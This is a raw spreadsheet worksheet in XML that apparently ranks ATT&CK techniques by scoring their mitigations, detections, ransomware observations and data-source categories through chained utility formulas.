    <col min="40" max="40" width="16.125" style="25" customWidth="1"/>
    <col min="41" max="41" width="13.625" style="30" customWidth="1"/>
    <col min="42" max="42" width="33.125" style="25" customWidth="1"/>
    <col min="43" max="43" width="20.875" style="25" customWidth="1"/>
    <col min="44" max="44" width="18.5" style="25" customWidth="1"/>
    <col min="45" max="45" width="24.125" style="25" customWidth="1"/>
    <col min="46" max="46" width="15.875" style="25" customWidth="1"/>
    <col min="47" max="47" width="37.875" style="25" customWidth="1"/>
    <col min="48" max="16384" width="11" style="25"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:47" ht="15" customHeight="1">
      <c r="B1" s="25"/>
      <c r="F1" s="72" t="s">
        <v>33</v>
      </c>
      <c r="G1" s="72"/>
      <c r="H1" s="72"/>
      <c r="I1" s="72"/>
      <c r="J1" s="72"/>
      <c r="K1" s="72"/>
      <c r="L1" s="72"/>
      <c r="M1" s="32" t="s">
        <v>34</v>
      </c>
      <c r="N1" s="73" t="s">
        <v>35</v>
      </c>
      <c r="O1" s="73"/>
      <c r="P1" s="73"/>
      <c r="Q1" s="73"/>
      <c r="R1" s="73"/>
      <c r="S1" s="73"/>
      <c r="T1" s="73"/>
      <c r="U1" s="73"/>
      <c r="V1" s="73"/>
      <c r="W1" s="16"/>
      <c r="X1" s="16"/>
      <c r="Y1" s="16"/>
      <c r="Z1" s="16"/>
      <c r="AA1" s="16"/>
      <c r="AB1" s="16"/>
      <c r="AC1" s="75" t="s">
        <v>36</v>
      </c>
      <c r="AD1" s="75"/>
      <c r="AE1" s="75"/>
      <c r="AF1" s="75"/>
      <c r="AG1" s="75"/>
      <c r="AH1" s="75"/>
      <c r="AI1" s="75"/>
      <c r="AJ1" s="75"/>
      <c r="AK1" s="75"/>
      <c r="AL1" s="75"/>
      <c r="AM1" s="34"/>
      <c r="AN1" s="71" t="s">
        <v>37</v>
      </c>
      <c r="AO1" s="71"/>
      <c r="AP1" s="71"/>
      <c r="AQ1" s="71"/>
      <c r="AR1" s="71"/>
      <c r="AS1" s="71"/>
      <c r="AT1" s="71"/>
      <c r="AU1" s="71"/>
    </row>
    <row r="2" spans="1:47">
      <c r="B2" s="25"/>
      <c r="F2" s="31"/>
      <c r="G2" s="31"/>
      <c r="H2" s="31"/>
      <c r="I2" s="31"/>
      <c r="J2" s="31"/>
      <c r="K2" s="31"/>
      <c r="L2" s="31"/>
      <c r="M2" s="32"/>
      <c r="N2" s="73" t="s">
        <v>38</v>
      </c>
      <c r="O2" s="73"/>
      <c r="P2" s="73"/>
      <c r="Q2" s="73"/>
      <c r="R2" s="74" t="s">
        <v>39</v>
      </c>
      <c r="S2" s="74"/>
      <c r="T2" s="74"/>
      <c r="U2" s="74"/>
      <c r="V2" s="33"/>
      <c r="W2" s="16"/>
      <c r="X2" s="16"/>
      <c r="Y2" s="16"/>
      <c r="Z2" s="16"/>
      <c r="AA2" s="16"/>
      <c r="AB2" s="16"/>
      <c r="AC2" s="34"/>
      <c r="AD2" s="34"/>
      <c r="AE2" s="34"/>
      <c r="AF2" s="34"/>
      <c r="AG2" s="34"/>
      <c r="AH2" s="34"/>
      <c r="AI2" s="34"/>
      <c r="AJ2" s="34"/>
      <c r="AK2" s="34"/>
      <c r="AL2" s="34"/>
      <c r="AM2" s="34"/>
      <c r="AN2" s="8"/>
      <c r="AO2" s="25"/>
    </row>
    <row r="3" spans="1:47">
      <c r="A3" s="25" t="s">
        <v>40</v>
      </c>
      <c r="B3" s="25" t="s">
        <v>41</v>
      </c>
      <c r="C3" s="25" t="s">
        <v>42</v>
      </c>
      <c r="D3" s="25" t="s">
        <v>43</v>
      </c>
      <c r="E3" s="46" t="s">
        <v>44</v>
      </c>
      <c r="F3" s="25" t="s">
        <v>45</v>
      </c>
      <c r="G3" s="25" t="s">
        <v>46</v>
      </c>
      <c r="H3" s="25" t="s">
        <v>47</v>
      </c>
      <c r="I3" t="s">
        <v>48</v>
      </c>
      <c r="J3" t="s">
        <v>49</v>
      </c>
      <c r="K3" t="s">
        <v>50</v>
      </c>
      <c r="L3" t="s">
        <v>51</v>
      </c>
      <c r="M3" s="25" t="s">
        <v>52</v>
      </c>
      <c r="N3" s="26" t="s">
        <v>53</v>
      </c>
      <c r="O3" s="26" t="s">
        <v>54</v>
      </c>
      <c r="P3" s="26" t="s">
        <v>55</v>
      </c>
      <c r="Q3" s="26" t="s">
        <v>56</v>
      </c>
      <c r="R3" s="27" t="s">
        <v>57</v>
      </c>
      <c r="S3" s="27" t="s">
        <v>58</v>
      </c>
      <c r="T3" s="27" t="s">
        <v>59</v>
      </c>
      <c r="U3" s="27" t="s">
        <v>60</v>
      </c>
      <c r="V3" s="25" t="s">
        <v>61</v>
      </c>
      <c r="W3" t="s">
        <v>62</v>
      </c>
      <c r="X3" t="s">
        <v>63</v>
      </c>
      <c r="Y3" t="s">
        <v>64</v>
      </c>
      <c r="Z3" t="s">
        <v>65</v>
      </c>
      <c r="AA3" t="s">
        <v>66</v>
      </c>
      <c r="AB3" t="s">
        <v>67</v>
      </c>
      <c r="AC3" s="28" t="s">
        <v>68</v>
      </c>
      <c r="AD3" s="25" t="s">
        <v>69</v>
      </c>
      <c r="AE3" s="25" t="s">
        <v>70</v>
      </c>
      <c r="AF3" s="25" t="s">
        <v>71</v>
      </c>
      <c r="AG3" s="25" t="s">
        <v>72</v>
      </c>
      <c r="AH3" s="25" t="s">
        <v>73</v>
      </c>
      <c r="AI3" s="25" t="s">
        <v>74</v>
      </c>
      <c r="AJ3" s="25" t="s">
        <v>75</v>
      </c>
      <c r="AK3" s="25" t="s">
        <v>76</v>
      </c>
      <c r="AL3" s="25" t="s">
        <v>77</v>
      </c>
      <c r="AM3" s="25" t="s">
        <v>78</v>
      </c>
      <c r="AN3" s="47" t="s">
        <v>79</v>
      </c>
      <c r="AO3" s="25" t="s">
        <v>80</v>
      </c>
      <c r="AP3" s="25" t="s">
        <v>81</v>
      </c>
      <c r="AQ3" s="25" t="s">
        <v>82</v>
      </c>
      <c r="AR3" s="25" t="s">
        <v>83</v>
      </c>
      <c r="AS3" s="25" t="s">
        <v>84</v>
      </c>
      <c r="AT3" s="25" t="s">
        <v>85</v>
      </c>
      <c r="AU3" s="25" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="4" spans="1:47" ht="32.1">
      <c r="A4" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B4" s="25">
        <f>SUM(H4,M4,V4)*(1+SUM(AE4,AG4,AI4,AK4,AM4))</f>
        <v>3.3030571428571429</v>
      </c>
      <c r="C4" s="25" t="s">
        <v>87</v>
      </c>
      <c r="D4" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E4" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F4" s="51">
        <v>10</v>
      </c>
      <c r="G4" s="51">
        <v>15</v>
      </c>
      <c r="H4" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>1</v>
      </c>
      <c r="I4">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>1</v>
      </c>
      <c r="J4">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="K4">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.5</v>
      </c>
      <c r="L4">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M4" s="44">
        <v>1</v>
      </c>
      <c r="N4" s="51">
        <v>1</v>
      </c>
      <c r="O4" s="51">
        <v>32</v>
      </c>
      <c r="P4" s="51">
        <v>27</v>
      </c>
      <c r="Q4" s="51">
        <v>7</v>
      </c>
      <c r="R4" s="52" t="s">
        <v>90</v>
      </c>
      <c r="S4" s="51">
        <v>22</v>
      </c>
      <c r="T4" s="51" t="s">
        <v>91</v>
      </c>
      <c r="U4" s="51">
        <v>24</v>
      </c>
      <c r="V4" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.75714285714285712</v>
      </c>
      <c r="W4">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>46</v>
      </c>
      <c r="X4">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.83636363636363631</v>
      </c>
      <c r="Y4">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.83636363636363631</v>
      </c>
      <c r="Z4">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>67</v>
      </c>
      <c r="AA4">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.67</v>
      </c>
      <c r="AB4">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.67</v>
      </c>
      <c r="AC4" s="29" t="s">
        <v>92</v>
      </c>
      <c r="AD4" s="25" t="str" cm="1">
        <f t="array" ref="AD4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC4)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE4" s="25">
        <f>IF(AD4="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF4" s="25" t="str" cm="1">
        <f t="array" ref="AF4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG4" s="25">
        <f>IF(AF4="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH4" s="25" t="str" cm="1">
        <f t="array" ref="AH4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI4" s="25">
        <f>IF(AH4="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ4" s="25" t="str" cm="1">
        <f t="array" ref="AJ4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK4" s="25">
        <f>IF(AJ4="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL4" s="25" t="str" cm="1">
        <f t="array" ref="AL4">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC4)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM4" s="25">
        <f>IF(AL4="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN4" s="59">
        <v>5</v>
      </c>
      <c r="AO4" s="51">
        <v>1</v>
      </c>
      <c r="AP4" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ4" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.1010190476190476</v>
      </c>
      <c r="AR4" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS4" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT4" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU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 spans="1:47">
      <c r="A5" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.27432000000000001</v>
      </c>
      <c r="B5" s="25">
        <f>SUM(H5,M5,V5)*(1+SUM(AE5,AG5,AI5,AK5,AM5))</f>
        <v>2.0765333333333333</v>
      </c>
      <c r="C5" s="25" t="s">
        <v>93</v>
      </c>
      <c r="D5" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E5" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F5" s="51">
        <v>1</v>
      </c>
      <c r="G5" s="51">
        <v>1</v>
      </c>
      <c r="H5" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I5">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J5">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K5">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L5">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M5" s="44">
        <v>1</v>
      </c>
      <c r="N5" s="51">
        <v>0</v>
      </c>
      <c r="O5" s="51">
        <v>53</v>
      </c>
      <c r="P5" s="51">
        <v>16</v>
      </c>
      <c r="Q5" s="51">
        <v>0</v>
      </c>
      <c r="R5" s="52" t="s">
        <v>95</v>
      </c>
      <c r="S5" s="51">
        <v>14</v>
      </c>
      <c r="T5" s="52" t="s">
        <v>96</v>
      </c>
      <c r="U5" s="51">
        <v>18</v>
      </c>
      <c r="V5" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.6333333333333333</v>
      </c>
      <c r="W5">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X5">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y5">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z5">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>69</v>
      </c>
      <c r="AA5">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.69</v>
      </c>
      <c r="AB5">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.69</v>
      </c>
      <c r="AC5" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD5" s="25" t="str" cm="1">
        <f t="array" ref="AD5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC5)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE5" s="25">
        <f>IF(AD5="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF5" s="25" t="str" cm="1">
        <f t="array" ref="AF5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG5" s="25">
        <f>IF(AF5="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH5" s="25" t="str" cm="1">
        <f t="array" ref="AH5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI5" s="25">
        <f>IF(AH5="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ5" s="25" t="str" cm="1">
        <f t="array" ref="AJ5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK5" s="25">
        <f>IF(AJ5="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL5" s="25" t="str" cm="1">
        <f t="array" ref="AL5">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC5)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM5" s="25">
        <f>IF(AL5="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN5" s="60">
        <v>2</v>
      </c>
      <c r="AO5" s="51">
        <v>1</v>
      </c>
      <c r="AP5" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.27432000000000001</v>
      </c>
      <c r="AQ5" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.69217777777777778</v>
      </c>
      <c r="AR5" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.69217777777777778</v>
      </c>
      <c r="AS5" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT5" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU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6" spans="1:47" ht="63.95">
      <c r="A6" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.37756666666666672</v>
      </c>
      <c r="B6" s="25">
        <f>SUM(H6,M6,V6)*(1+SUM(AE6,AG6,AI6,AK6,AM6))</f>
        <v>2.1090000000000004</v>
      </c>
      <c r="C6" s="25" t="s">
        <v>98</v>
      </c>
      <c r="D6" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E6" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F6" s="51">
        <v>1</v>
      </c>
      <c r="G6" s="51">
        <v>1</v>
      </c>
      <c r="H6" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I6">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J6">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K6">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L6">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M6" s="44">
        <v>1</v>
      </c>
      <c r="N6" s="51">
        <v>0</v>
      </c>
      <c r="O6" s="51">
        <v>5</v>
      </c>
      <c r="P6" s="51">
        <v>48</v>
      </c>
      <c r="Q6" s="51">
        <v>1</v>
      </c>
      <c r="R6" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S6" s="51">
        <v>8</v>
      </c>
      <c r="T6" s="52" t="s">
        <v>101</v>
      </c>
      <c r="U6" s="51">
        <v>16</v>
      </c>
      <c r="V6" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.48571428571428577</v>
      </c>
      <c r="W6">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>24</v>
      </c>
      <c r="X6">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Y6">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Z6">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>54</v>
      </c>
      <c r="AA6">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.54</v>
      </c>
      <c r="AB6">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.54</v>
      </c>
      <c r="AC6" s="29" t="s">
        <v>102</v>
      </c>
      <c r="AD6" s="25" t="str" cm="1">
        <f t="array" ref="AD6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC6)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE6" s="25">
        <f>IF(AD6="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF6" s="25" t="str" cm="1">
        <f t="array" ref="AF6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC6)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG6" s="25">
        <f>IF(AF6="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH6" s="25" t="str" cm="1">
        <f t="array" ref="AH6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC6)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI6" s="25">
        <f>IF(AH6="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ6" s="25" t="str" cm="1">
        <f t="array" ref="AJ6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC6)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK6" s="25">
        <f>IF(AJ6="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL6" s="25" t="str" cm="1">
        <f t="array" ref="AL6">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC6)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM6" s="25">
        <f>IF(AL6="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN6" s="60">
        <v>5</v>
      </c>
      <c r="AO6" s="51">
        <v>0</v>
      </c>
      <c r="AP6" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.37756666666666672</v>
      </c>
      <c r="AQ6" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.70300000000000018</v>
      </c>
      <c r="AR6" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.70300000000000018</v>
      </c>
      <c r="AS6" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT6" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU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7" spans="1:47" ht="63.95">
      <c r="A7" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.4815166666666667</v>
      </c>
      <c r="B7" s="25">
        <f>SUM(H7,M7,V7)*(1+SUM(AE7,AG7,AI7,AK7,AM7))</f>
        <v>2.8151666666666668</v>
      </c>
      <c r="C7" s="25" t="s">
        <v>103</v>
      </c>
      <c r="D7" s="25" t="s">
        <v>104</v>
      </c>
      <c r="E7" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F7" s="51">
        <v>3</v>
      </c>
      <c r="G7" s="51">
        <v>12</v>
      </c>
      <c r="H7" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.65</v>
      </c>
      <c r="I7">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J7">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K7">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.2</v>
      </c>
      <c r="L7">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M7" s="44">
        <v>1</v>
      </c>
      <c r="N7" s="51">
        <v>3</v>
      </c>
      <c r="O7" s="51">
        <v>33</v>
      </c>
      <c r="P7" s="51">
        <v>5</v>
      </c>
      <c r="Q7" s="51">
        <v>7</v>
      </c>
      <c r="R7" s="52" t="s">
        <v>105</v>
      </c>
      <c r="S7" s="51">
        <v>7</v>
      </c>
      <c r="T7" s="51" t="s">
        <v>106</v>
      </c>
      <c r="U7" s="51">
        <v>18</v>
      </c>
      <c r="V7" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="W7">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X7">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y7">
